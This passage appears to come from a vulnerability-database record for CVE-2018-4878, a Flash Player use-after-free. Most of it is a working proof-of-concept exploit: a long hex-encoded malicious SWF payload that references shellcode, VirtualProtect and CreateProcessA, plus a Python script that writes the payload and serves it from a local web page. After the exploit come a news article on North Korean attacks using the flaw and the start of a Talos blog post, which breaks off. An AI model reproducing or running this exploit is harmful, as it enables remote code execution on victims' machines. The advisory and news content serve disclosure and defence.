\x69\\x6D\\x69\\x74\\x0B\\x5F\\x5F\\x41\\x53\\x33\\x5F\\x5F\\x2E\\x76\\x65\\x63\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x36\\x05\\x41\\x72\\x72\\x61\\x79\\x04\\x63\\x61\\x6C\\x6C\\x05\\x61\\x70\\x70\\x6C\\x79\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x31\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x24\\x31\\x09\\x75\\x6E\\x64\\x65\\x66\\x69\\x6E\\x65\\x64\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x0F\\x72\\x65\\x61\\x64\\x55\\x6E\\x73\\x69\\x67\\x6E\\x65\\x64\\x49\\x6E\\x74\\x04\\x70\\x75\\x73\\x68\\x06\\x6C\\x65\\x6E\\x67\\x74\\x68\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x34\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x35\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x33\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x35\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x34\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x37\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x38\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x39\\x03\\x72\\x65\\x73\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x34\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x0D\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x31\\x34\\x35\\x03\\x31\\x37\\x37\\x03\\x32\\x39\\x32\\x03\\x33\\x38\\x32\\x04\\x33\\x32\\x31\\x32\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x04\\x34\\x34\\x31\\x34\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x32\\x31\\x35\\x02\\x39\\x33\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x02\\x63\\x72\\x02\\x6E\\x65\\x0C\\x6B\\x65\\x72\\x6E\\x65\\x6C\\x33\\x32\\x2E\\x64\\x6C\\x6C\\x0E\\x76\\x69\\x72\\x74\\x75\\x61\\x6C\\x70\\x72\\x6F\\x74\\x65\\x63\\x74\\x0E\\x63\\x72\\x65\\x61\\x74\\x65\\x70\\x72\\x6F\\x63\\x65\\x73\\x73\\x61\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x11\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x46\\x75\\x6E\\x63\\x08\\x66\\x69\\x6E\\x64\\x66\\x75\\x6E\\x63\\x3A\\x05\\x01\\x16\\x04\\x17\\x04\\x08\\x12\\x05\\x42\\x18\\x01\\x1A\\x01\\x1A\\x43\\x16\\x44\\x16\\x6C\\x16\\x6C\\x17\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x06\\x09\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x01\\x03\\x09\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x67\\x07\\x02\\x09\\x07\\x03\\x0B\\x07\\x03\\x0C\\x07\\x03\\x0D\\x07\\x02\\x0E\\x07\\x03\\x75\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x04\\x11\\x07\\x02\\x1A\\x07\\x03\\x02\\x07\\x02\\x16\\x07\\x03\\x2B\\x07\\x03\\x2C\\x07\\x03\\x2D\\x07\\x03\\x2E\\x07\\x03\\x2F\\x07\\x03\\x30\\x07\\x03\\x31\\x07\\x03\\x23\\x07\\x02\\x32\\x07\\x03\\x3F\\x07\\x02\\x40\\x09\\x41\\x01\\x07\\x09\\x41\\x1D\\x19\\x01\\x01\\x1B\\x02\\x07\\x03\\x45\\x07\\x03\\x46\\x07\\x02\\x47\\x07\\x04\\x48\\x07\\x04\\x49\\x07\\x02\\x4C\\x07\\x02\\x4D\\x07\\x02\\x4E\\x07\\x02\\x4F\\x07\\x04\\x50\\x07\\x02\\x51\\x07\\x03\\x52\\x07\\x03\\x53\\x07\\x03\\x54\\x07\\x03\\x29\\x07\\x03\\x55\\x07\\x03\\x56\\x07\\x03\\x57\\x07\\x03\\x58\\x07\\x03\\x59\\x07\\x03\\x5A\\x07\\x03\\x5B\\x07\\x02\\x5C\\x07\\x03\\x66\\x07\\x03\\x01\\x07\\x02\\x43\\x09\\x01\\x03\\x07\\x02\\x68\\x07\\x0A\\x6D\\x07\\x0A\\x6E\\x07\\x0A\\x6F\\x07\\x0C\\x66\\x07\\x0A\\x0E\\x07\\x0A\\x16\\x07\\x0A\\x47\\x07\\x0A\\x4C\\x07\\x0A\\x09\\x1D\\x19\\x01\\x40\\x07\\x0A\\x4D\\x07\\x0A\\x4E\\x07\\x0A\\x0F\\x07\\x0A\\x4F\\x07\\x0A\\x51\\x09\\x41\\x04\\x1D\\x19\\x01\\x40\\x07\\x0C\\x46\\x07\\x0C\\x52\\x07\\x0C\\x53\\x07\\x0C\\x0C\\x07\\x0C\\x3F\\x07\\x0C\\x0B\\x07\\x0C\\x45\\x07\\x0C\\x02\\x07\\x0A\\x40\\x1D\\x19\\x01\\x40\\x1B\\x05\\x07\\x0A\\x1A\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x0D\\x07\\x0C\\x76\\x07\\x0A\\x10\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x77\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x78\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x00\\x00\\x04\\x00\\x01\\x00\\x40\\x08\\x8C\\x01\\x01\\x03\\x06\\x00\\x40\\x33\\x02\\x03\\x00\\x40\\x40\\x40\\x4A\\x80\\x06\\x34\\x35\\x00\\x00\\x5D\\x02\\x00\\x00\\x5E\\x00\\x00\\x00\\x04\\x00\\x08\\x5F\\x01\\x60\\x61\\x5F\\x01\\x60\\x62\\x5F\\x01\\x60\\x63\\x5F\\x01\\x60\\x64\\x5F\\x01\\x60\\x65\\x5F\\x01\\x60\\x67\\x69\\x01\\x60\\x6A\\x5F\\x01\\x60\\x6B\\x01\\x34\\x35\\x09\\x06\\x00\\x05\\x00\\x00\\x06\\x5F\\x40\\x01\\x40\\x00\\x01\\x00\\x06\\x40\\x02\\x01\\x00\\x01\\x01\\x4D\\x51\\x03\\x01\\x01\\x02\\x64\\x51\\x04\\x02\\x01\\x03\\x4B\\x51\\x05\\x03\\x01\\x04\\x3B\\x51\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x34\\x44\\x00\\x00\\x02\\x06\\x07\\x07\\x00\\x08\\x01\\x04\\x05\\x0D\\xD0\\x30\\xEF\\x01\\x02\\x00\\x09\\xEF\\x01\\x03\\x01\\x0A\\x47\\x00\\x00\\x01\\x08\\x03\\x04\\x05\\x01\\x47\\x00\\x00\\x02\\x0C\\x03\\x05\\x0A\\xA4\\x06\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x65\\x01\\x24\\x00\\x74\\x6D\\x02\\xF0\\x19\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x65\\x01\\x24\\x00\\x74\\x6D\\x04\\xF0\\x1B\\x65\\x01\\x24\\x00\\x74\\x6D\\x05\\xF0\\x1C\\x65\\x01\\x24\\x00\\x74\\x6D\\x06\\x65\\x01\\x24\\x00\\x74\\x6D\\x07\\xF0\\x1E\\x65\\x01\\x24\\x00\\x73\\x6D\\x08\\x65\\x01\\x5D\\x4E\\x5D\\x4C\\x5D\\x57\\x66\\x57\\x46\\x4C\\x01\\x46\\x4E\\x01\\x2F\\x01\\xA8\\x74\\x6D\\x01\\x65\\x01\\x65\\x01\\x6C\\x01\\x2D\\x02\\xA1\\x74\\x6D\\x02\\x10\\x3B\\x00\\x00\\x09\\xF0\\x26\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x46\\x4E\\x01\\x2D\\x03\\xA8\\x25\\xCD\\xB4\\x01\\x14\\x0D\\x00\\x00\\xF0\\x28\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x10\\x22\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\x65\\x01\\x65\\x01\\x6C\\x02\\x2D\\x04\\xA1\\x74\\x6D\\x02\\x65\\x01\\x6C\\x03\\x25\\x80\\x04\\x15\\xBA\\xFF\\xFF\\x65\\x01\\x6C\\x01\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x30\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x32\\x5E\\x58\\x65\\x01\\x6C\\x02\\x61\\x58\\xF0\\x33\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x24\\x3C\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x46\\x4E\\x01\\x25\\xD0\\x8A\\x01\\x14\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x36\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x84\\x01\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x04\\xF0\\x39\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x80\\x01\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x65\\x01\\x24\\x03\\x24\\x04\\xA2\\x74\\x6D\\x03\\x10\\x70\\x00\\x00\\x09\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x46\\x4E\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x24\\x0C\\x46\\x59\\x01\\x46\\x09\\x00\\x2C\\x72\\x14\\x35\\x00\\x00\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x03\\x24\\x04\\xA2\\xA1\\x46\\x4E\\x01\\x74\\x6D\\x05\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x04\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x06\\xF0\\x42\\x10\\x1B\\x00\\x00\\x65\\x01\\x65\\x01\\x6C\\x03\\x24\\x05\\x24\\x04\\xA2\\xA0\\x74\\x6D\\x03\\x65\\x01\\x6C\\x03\\x65\\x01\\x6C\\x04\\x15\\x84\\xFF\\xFF\\x65\\x01\\x6C\\x05\\x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\" \n \n \nprint \"[+] CVE-2018-4878 poc \" \nprint \"[x] files created\" \n \nswf = \"%s.swf\" % flash_name \n \nhtml = \"\"\" \n<!DOCTYPE html> \n<html> \n \n\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\" \n</html> \n\"\"\" \n \nf = open(\"%s\" % swf, \"wb\") \nf.write(data) \nf.close() \n \nf = open(\"index.html\", \"wb\") \nf.write(html) \nf.close() \n \n \nHandlerClass = SimpleHTTPRequestHandler \nServerClass = BaseHTTPServer.HTTPServer \nProtocol = \"HTTP/1.0\" \n \n \nport = 8080 \nserver_address = ('0.0.0.0', port) \n \nHandlerClass.protocol_version = Protocol \nhttpd = ServerClass(server_address, HandlerClass) \n \nsa = httpd.socket.getsockname() \nprint \"Server ready\", sa[0], \"port\", sa[1], \"...\" \nhttpd.serve_forever() \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147041/flashp0c.py.txt"}], "thn": [{"lastseen": "2018-02-02T09:52:46", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878"], "description": "[](<https://1.bp.blogspot.com/-N0rBFsKfvJg/WnP_Z6mQQUI/AAAAAAAAvqA/Atki8zSxvMMXzU6BgC-RDnm6DGfrFf-kACLcBGAs/s1600-e20/flash-zero-dy-exploit.png>)\n\nAnother reason to uninstall Adobe Flash Player\u2014a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers. \n \nSouth Korea's Computer Emergency Response Team (KR-CERT) [issued](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea. \n \nSimon Choi of South Korea-based cybersecurity firm Hauri first [reported](<https://twitter.com/issuemakerslab/status/959006385550778369>) the campaign on Twitter, saying the North Korean hackers have been using the Flash zero-day against South Koreans since mid-November 2017. \n \nAlthough Choi did not share any malware sample or details about the vulnerability, the researcher said the attacks using the new Flash zero-day is aimed at South Korean individuals who focus on researching North Korea. \n \nAdobe also released an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) on Wednesday, which said the zero-day is exploiting a critical 'use-after-free' vulnerability (CVE-2018-4878) in its Flash media software that leads to remote code execution. \n\n\n[](<https://1.bp.blogspot.com/--1vyZSg6wok/WnP-KAgrsvI/AAAAAAAAvp0/Ex5zBHKR2egnfF27QpGfeR_YbETdU66hwCLcBGAs/s1600-e20/adobe-flash-player-zero-day-exploit.png>)\n\nThe critical vulnerability affects Adobe Flash Player version 28.0.0.137 and earlier versions for: \n\n\n * Desktop Runtime (Win/Mac/Linux)\n * Google Chrome (Win/Mac/Linux/Chrome OS)\n * Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1)\n \n\n\n> \"Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users,\" the advisory said. \"These attacks leverage Office documents with embedded malicious Flash content distributed via email. **_Adobe will address this vulnerability in a release planned for the week of February 5._**\"\n\n \nTo exploit the vulnerability, all an attacker need to do is trick victims into opening Microsoft Office documents, web pages, or spam messages that contain a maliciously crafted Adobe Flash file. \n \nThe vulnerability can be leveraged by hackers to take control of an affected computer. \n \nChoi also posted a screenshot to show that the Flash Player zero-day exploit has been delivered via malicious Microsoft Excel files. \n \nAdobe said in its advisory that the company has planned to address this vulnerability in a \"release planned for the week of February 5,\" through KR-CERT advises users to disable or completely remove the buggy software.\n", "modified": "2018-02-02T06:10:47", "published": "2018-02-01T19:10:00", "id": "THN:3BC4F7FE3170D82B2C8328638552D1D3", "href": "https://thehackernews.com/2018/02/flash-zero-day-exploit.html", "type": "thn", "title": "(Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-03-02T10:51:10", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4878"], "description": "This blog post is authored by [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Paul Rascagneres](<https://twitter.com/r00tbsd>). \n \n\n\n## Executive Summary\n\n \nThe 1st of February, Adobe published an advisory concerning a Flash vulnerability (CVE-2018-4878). This vulnerability is a use after free that allows Remote Code Execute through a malformed Flash object. Additionally KISA (Korean CERT) published an [advisory ](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>)about a Flash 0-day used in the wild. Talos identified 